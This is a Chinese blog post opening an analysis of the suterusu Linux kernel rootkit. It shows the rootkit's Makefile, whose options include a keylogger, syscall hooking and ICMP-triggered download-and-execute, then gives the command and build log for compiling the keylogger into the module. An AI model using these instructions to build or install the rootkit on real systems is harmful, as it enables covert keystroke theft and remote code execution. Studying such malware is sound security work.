Linux LKM suterusu代码分析(一)

suterusu lkm 代码下载路径:

https://github.com/mncoppola/suterusu

虽然这个LKM开发的时间是好几年前的,但是也是值得好好研究其中的hook原理,我这里使用的系统是 Ubuntu 14.04.1 LTS ,内核版本4.2.0-42-generic。

编译  -->  make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build

我们先来看看Makefile

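# Kbuild glue: the out-of-tree module suterusu.ko is linked from these objects.
obj-m += suterusu.o
suterusu-objs := main.o util.o module.o

# -D_CONFIG_*_ defines that the target rules below pass to the kernel build via
# EXTRA_CFLAGS.  Start from an explicit empty value so a stray MODULES variable
# inherited from the environment cannot leak onto the compiler command line.
MODULES :=

# Optional modules.  Each is compiled in only when the matching variable is set
# on the make command line (e.g. KEYLOGGER=1).  `ifdef` tests only whether the
# variable has a non-empty value, not what the value is, so KEYLOGGER=0 also
# enables it.  UNLOCK/LOGFILE are nested under KEYLOGGER and ICMP under DLEXEC:
# they have no effect unless the parent option is set too.  Non-recipe lines
# are indented with spaces, never tabs, so make cannot mistake them for recipe
# text.
ifdef KEYLOGGER
  suterusu-objs += keylogger.o
  MODULES += -D_CONFIG_KEYLOGGER_
  ifdef UNLOCK
    MODULES += -D_CONFIG_UNLOCK_
  endif
  ifdef LOGFILE
    MODULES += -D_CONFIG_LOGFILE_
  endif
endif

ifdef HOOKRW
  suterusu-objs += hookrw.o
  MODULES += -D_CONFIG_HOOKRW_
endif

ifdef DLEXEC
  suterusu-objs += dlexec.o
  MODULES += -D_CONFIG_DLEXEC_
  ifdef ICMP
    suterusu-objs += icmp.o
    MODULES += -D_CONFIG_ICMP_
  endif
endif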

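# Default goal (first rule in the file): print usage only, build nothing.
# Declared phony so a file named "default" in the build dir cannot mask it.
.PHONY: default
default:
	@echo "To build Suterusu:"
	@echo "  make TARGET KDIR=/path/to/kernel"
	@echo
	@echo "To build with additional modules:"
	@echo "  make TARGET KDIR=/path/to/kernel MODULE1=y MODULE2=y..."
	@echo
	@echo "To cross-compile:"
	@echo "  make TARGET CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel"
	@echo
	@echo "To clean the build dir:"
	@echo "  make clean KDIR=/path/to/kernel"
	@echo
	@echo "Supported targets:"
	@echo "linux-x86    	Linux, x86"
	@echo "linux-x86_64 	Linux, x86_64"
	@echo "android-arm  	Android Linux, ARM"
	@echo
	@echo "Supported modules:"
	@echo "KEYLOGGER    Monitor keystrokes"
	@echo "  UNLOCK     Unlock the screen upon given key sequence"
	@echo "  LOGFILE    Log keystrokes to a local file"
	@echo "HOOKRW       Hook sys_read and sys_write"
	@echo "DLEXEC       Download & execute a binary upon event"
	@echo "  ICMP       Monitor inbound ICMP for magic packet"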

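# Build for 32-bit x86 against the kernel tree in KDIR.  The ifndef is a
# parse-time conditional: when KDIR is unset the recipe consists only of the
# error message and a failing exit.  M= uses $(CURDIR) (make's own working
# directory) rather than $(PWD), which comes from the environment and may be
# unset or stale when make is started with -C or from a non-shell parent.
.PHONY: linux-x86
linux-x86:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=x86 EXTRA_CFLAGS="-D_CONFIG_X86_ $(MODULES)" -C $(KDIR) M=$(CURDIR) modules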

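# Build for x86_64 against the kernel tree in KDIR.  The selected optional
# modules are visible to anyone reading the build log, because the whole
# EXTRA_CFLAGS string (including every -D_CONFIG_*_) is echoed by make.
# $(CURDIR) replaces $(PWD) so M= is correct even when PWD is absent from the
# environment or make was invoked with -C.
.PHONY: linux-x86_64
linux-x86_64:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ $(MODULES)" -C $(KDIR) M=$(CURDIR) modules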

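# Build for ARM (Android kernel tree in KDIR).  Besides the arch define this
# target additionally passes -fno-pic to the compiler; CROSS_COMPILE is not set
# here and must come from the command line (see the usage text).  $(CURDIR)
# replaces $(PWD) for the same robustness reason as the other targets.
.PHONY: android-arm
android-arm:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=arm EXTRA_CFLAGS="-D_CONFIG_ARM_ -fno-pic $(MODULES)" -C $(KDIR) M=$(CURDIR) modules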

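# Remove build products by delegating to the kernel build system; it needs the
# same KDIR as the build.  Declared .PHONY so that a file named "clean" in the
# module directory does not make this target look up to date.
.PHONY: clean
clean:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) -C $(KDIR) M=$(CURDIR) clean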

那如果我们要添加support modules我们应该怎么去编译呢?
从Makefile中可以看到,它使用 Make 的 ifdef 条件来决定是否编译 support modules,并通过 -D_CONFIG_*_ 宏把选择传给 C 代码中的 #ifdef。
比如我要在ko 中添加键盘记录功能,make 命令

make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1

需要编译其他功能时,只需按同样方式依次添加对应的变量即可。

curtis@curtis-virtual-machine:~/Desktop/suterusu-master$ make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_KEYLOGGER_" -C /lib/modules/4.2.0-42-generic/build M=/home/curtis/Desktop/suterusu-master modules
make[1]: Entering directory `/usr/src/linux-headers-4.2.0-42-generic'
  CC [M]  /home/curtis/Desktop/suterusu-master/main.o
  CC [M]  /home/curtis/Desktop/suterusu-master/util.o
  CC [M]  /home/curtis/Desktop/suterusu-master/module.o
  CC [M]  /home/curtis/Desktop/suterusu-master/keylogger.o
  LD [M]  /home/curtis/Desktop/suterusu-master/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/curtis/Desktop/suterusu-master/suterusu.mod.o
  LD [M]  /home/curtis/Desktop/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/linux-headers-4.2.0-42-generic'

成功将键盘记录功能编译进ko文件


转载自blog.csdn.net/qq_42931917/article/details/109047406